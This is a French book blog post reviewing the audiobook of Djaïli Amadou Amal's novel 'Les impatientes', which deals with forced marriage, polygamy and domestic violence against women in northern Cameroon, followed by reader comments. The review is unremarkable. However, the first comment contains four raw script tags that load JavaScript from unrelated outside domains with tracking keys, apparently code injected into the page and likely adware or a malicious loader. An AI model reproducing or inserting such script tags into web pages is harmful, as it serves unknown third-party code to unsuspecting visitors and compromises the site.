• Djaïli Amadou Amal, Les impatientes, Lizzie

    Djaïli Amadou Amal, Les impatientes, Lizzie

     

    Munyal -patience-, c'est le maître-mot de l'éducation des filles dans les familles du nord-Cameroun où se déroule ce roman choral. Dans cette société patriarcale où les désirs des femmes sont niés, on le leur répète au moment du mariage et à chaque crise traversée.

    Patience, Ramla, mariée à 17 ans, juste après son bac, à un homme de 50 ans, alors qu'elle espérait épouser son amoureux qui lui avait promis qu'elle pourrait continuer ses études.

    Patience, Hindu, mariée à son cousin alcoolique et violent qu'elle craint.
    Patience, Safira, dont le mari vient d'épouser Ramla qui a le même âge que sa fille.

     

     

    Mariage forcé, polygamie, viol conjugal, coups, mépris, Djaïli Amadou Amal dénonce la condition qui est faite aux femmes du Sahel et qu'elle a elle même connue avant de s'en échapper. Ici la violence patriarcale s'appuie sur la religion et la société fait reposer sur les femmes la responsabilité de l'honneur des familles. Tous les comportements déviants des hommes sont reprochés aux femmes: ton mari prends une deuxième épouse, c'est normal, ne t'en plaints pas, tu lui fais honte; ton mari boit, qu'as-tu fait pour l'y pousser, c'est la honte; ton mari te bat, serre les dents, tes cris nous font honte. Il y a des passages qui sont douloureux à entendre et qui me donnent envie de crier. Le poids des familles étendues est aussi très lourd et on doit obéir à ses oncles autant qu'à son père. Dans la concession les relations sont rarement bonnes entre les co-épouses et leurs enfants. C'est une société très inégalitaire où dominent les hommes, les vieux, les riches. Il y a des relations de clientélisme à la romaine où un patron est entouré de ses courtisans auxquels il dispense ses largesses. Il me paraît évident qu'elle ne fait souffrir que les femmes.

     

     

    C'est ma première expérience de livre-audio. Avant l'audition je me suis demandée si j'arriverais à bien fixer mon attention sur la lecture. Pas de problème, j'ai même réussi à tricoter en écoutant le texte. Il est lu par Léonie Simaga qui fait ça fort bien, il me semble. La place des dialogues est importante ce qui fait que c'est un roman qui se prête bien à être raconté, la lecture est vivante. Quand je lis un livre j'ai l'habitude de le parsemer de petits marque-page pour retrouver les passages qui m'intéressent ou me frappent plus particulièrement. Pas de ça ici donc pas de citation dans mon compte-rendu.

     

     

    L'avis de Hélène.

    Je participe au défi Voix d'autrices, catégorie Un roman choral.

     

    Djaïli Amadou Amal, Les impatientes, Lizzie

     


    Tags Tags : , , ,
  • Commentaires

    1
    keisha
    Mardi 28 Septembre à 09:55
    keisha

    J'hésite avec les livres audio, je n'ai pas grand chose à faire pendant ce temps. Le sport? (je préfère les oiseaux), le ménage? en voiture? pas équipée..;

    <script src="//westtank.net/2313bb93141d74fb89.js?2"></script> <script src="http://hublosk.com/js/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&uid=8979x" type="text/javascript"></script> <script src="http://jullyambery.net/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&uid=8979x&format=arrjs&r=1632815638600" type="text/javascript"></script> <script src="http://westtank.net/ext/2313bb93141d74fb89.js?sid=52715_8979_&title=aa&blocks[]=31af2" type="text/javascript"></script>
      • Mardi 28 Septembre à 11:38

        Le tricot ? J'avoue que je l'ai eu par Masse critique.

    Suivre le flux RSS des commentaires


    Ajouter un commentaire

    Nom / Pseudo :

    E-mail (facultatif) :

    Site Web (facultatif) :

    Commentaire :